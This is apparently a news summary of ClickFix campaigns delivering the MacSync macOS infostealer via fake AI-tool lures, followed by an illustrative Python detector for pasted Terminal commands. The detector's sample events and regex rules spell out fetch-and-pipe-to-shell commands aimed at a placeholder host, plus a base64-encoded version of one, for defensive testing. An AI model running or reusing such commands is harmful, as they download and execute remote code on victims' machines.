ClickFix Campaigns Spread MacSync macOS Infostealer via Fake AI Tool Installers
Briefly

"Unlike traditional exploit-based attacks, this method relies entirely on user interaction - usually in the form of copying and executing commands - making it particularly effective against users who may not appreciate the implications of running unknown and obfuscated terminal commands."
"A campaign that used the OpenAI Atlas browser as bait, delivered via sponsored search results on Google, to direct users to a fake Google Sites URL with a download button that, when clicked, displayed instructions to open the Terminal app and paste a command into it."
"A malvertising campaign that leveraged sponsored links tied to searches for queries like 'how to clean up your Mac' on Google to lead users to shared conversations on the legitimate OpenAI ChatGPT site to give the impression that the links were safe."
"A campaign targeting Belgium, India, and parts of North and South America that distributed a new variant of MacSync delivered through ClickFix lures. The latest iteration supports dynamic AppleScript payloads and in-memory execution to evade static analysis, bypass behavioral detections, and complicate incident response."
Three separate ClickFix campaigns have been identified distributing MacSync, a macOS information stealer, through social engineering rather than an exploit: the victim is talked into opening Terminal and pasting an obfuscated command, so the payload runs with the user's own privileges and no vulnerability is needed. The first campaign, in November 2025, used Google sponsored results for the OpenAI Atlas browser to send users to a fake Google Sites page whose download button displayed the paste-this-command instructions. The second, in December 2025, used sponsored links for queries like "how to clean up your Mac" that pointed at attacker-authored shared conversations on the legitimate ChatGPT site, borrowing that site's reputation to make the instructions look safe. The third, in February 2026, targeted Belgium, India, and parts of North and South America with a newer MacSync variant that fetches AppleScript payloads dynamically and executes them in memory to evade static analysis, sidestep behavioral detections, and complicate incident response. All three depend on users not recognising the risk of running unknown, obfuscated terminal commands.
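A check a defender would want after reading the above: the whole ClickFix delivery path is a command pasted into Terminal, so process-execution telemetry (the command line plus the parent process) is where it shows up, including for the in-memory AppleScript variant that leaves little on disk for file scanners. The Python below is an added example and is not code from the article, from MacSync, or from any vendor; its rule set, weights, threshold, parent-process list and sample events are all assumptions constructed for illustration.

```python
"""Heuristic detector for ClickFix-style pasted commands (added example).

Scores process-execution events for the shapes a ClickFix lure produces on
macOS: a terminal-spawned shell that decodes an obfuscated blob or fetches a
remote script and pipes it straight into an interpreter, or runs an inline
AppleScript whose body shells out. Rule set, weights, threshold and the sample
events below are constructed for this example, not signatures from the article.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Interpreters that will execute whatever is piped into them.
INTERPRETERS = r"(?:(?:ba|z|k|da)?sh|osascript|python3?|perl)"

# (rule name, weight, pattern). Weights are assumptions for this example.
RULES = [
    ("decode_to_interpreter", 4,      # ... | base64 -D | bash  (BSD base64 uses -D/--decode)
     re.compile(r"base64\s+(?:-[dD]|--decode)\s*\|\s*" + INTERPRETERS + r"\b")),
    ("fetch_to_interpreter", 4,       # curl ... | sh
     re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?" + INTERPRETERS + r"\b")),
    ("cmd_substitution_fetch", 4,     # bash -c "$(curl ...)"
     re.compile(r"\$\(\s*(?:curl|wget)\b")),
    ("inline_applescript_shell", 3,   # osascript -e '... do shell script ...'
     re.compile(r"osascript\s+-e\s+.*do shell script", re.I)),
    ("hex_or_printf_decode", 3,       # xxd -r -p | sh, printf '\x..'
     re.compile(r"xxd\s+-r\s+-p|printf\s+['\"]?\\x[0-9a-f]{2}", re.I)),
    ("long_base64_blob", 2,
     re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")),
    ("backgrounded", 1,
     re.compile(r"\bnohup\b|&\s*$")),
]

# Parent process names that indicate a human typed or pasted the command.
TERMINAL_PARENTS = {"Terminal", "iTerm2", "Warp", "Alacritty", "kitty"}


@dataclass
class Event:
    pid: int
    parent_name: str   # process name of the parent, e.g. "Terminal"
    user: str
    cmdline: str


@dataclass
class Finding:
    pid: int
    score: int
    hits: List[str] = field(default_factory=list)


def score_event(ev: Event, threshold: int = 5) -> Optional[Finding]:
    """Return a Finding when the command line looks like a pasted ClickFix payload."""
    hits = [name for name, _w, rx in RULES if rx.search(ev.cmdline)]
    score = sum(w for name, w, _rx in RULES if name in hits)
    # The ClickFix delivery path is a human pasting into a terminal; the same
    # text coming from launchd or a package manager deserves a lower score.
    if hits and ev.parent_name in TERMINAL_PARENTS:
        score += 2
        hits.append("terminal_parent")
    return Finding(ev.pid, score, hits) if score >= threshold else None


def scan(events: List[Event], threshold: int = 5) -> List[Finding]:
    return [f for f in (score_event(e, threshold) for e in events) if f]


# Constructed sample telemetry (not real events). The blob is generated here so
# that it is genuinely valid base64 of a harmless, non-resolving command.
DECOY_BLOB = base64.b64encode(b"curl -fsSL http://example.invalid/x.sh | sh\n").decode()
SAMPLE_EVENTS = [
    Event(101, "Terminal", "alice", f"echo {DECOY_BLOB} | base64 -D | bash"),
    Event(102, "Terminal", "alice",
          'osascript -e \'do shell script "curl -fsSL http://example.invalid/p | sh"\''),
    Event(103, "Terminal", "alice", "git status"),
    Event(104, "launchd", "root", "/usr/bin/curl -fsSL https://example.invalid/install.sh | sh"),
    Event(105, "Terminal", "alice", "brew install jq && base64 -D notes.b64 > notes.txt"),
    # Known false positive: the Homebrew installer is itself a pasted curl-to-bash.
    Event(106, "Terminal", "alice",
          '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"pid={f.pid} score={f.score} hits={f.hits}")
```

The Homebrew install line (pid 106) scores above the threshold on purpose: a pasted curl-to-bash is exactly the shape the lure takes, and legitimate installers use it too, so treat hits as a triage queue rather than a block rule and expect the decoder-to-interpreter and AppleScript-shells-out rules to carry most of the signal. The launchd-spawned curl-to-sh (pid 104) scores 4 and stays below the default threshold, which is a deliberate narrowing to the terminal delivery path; a broader rule should cover that case separately.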
Read at The Hacker News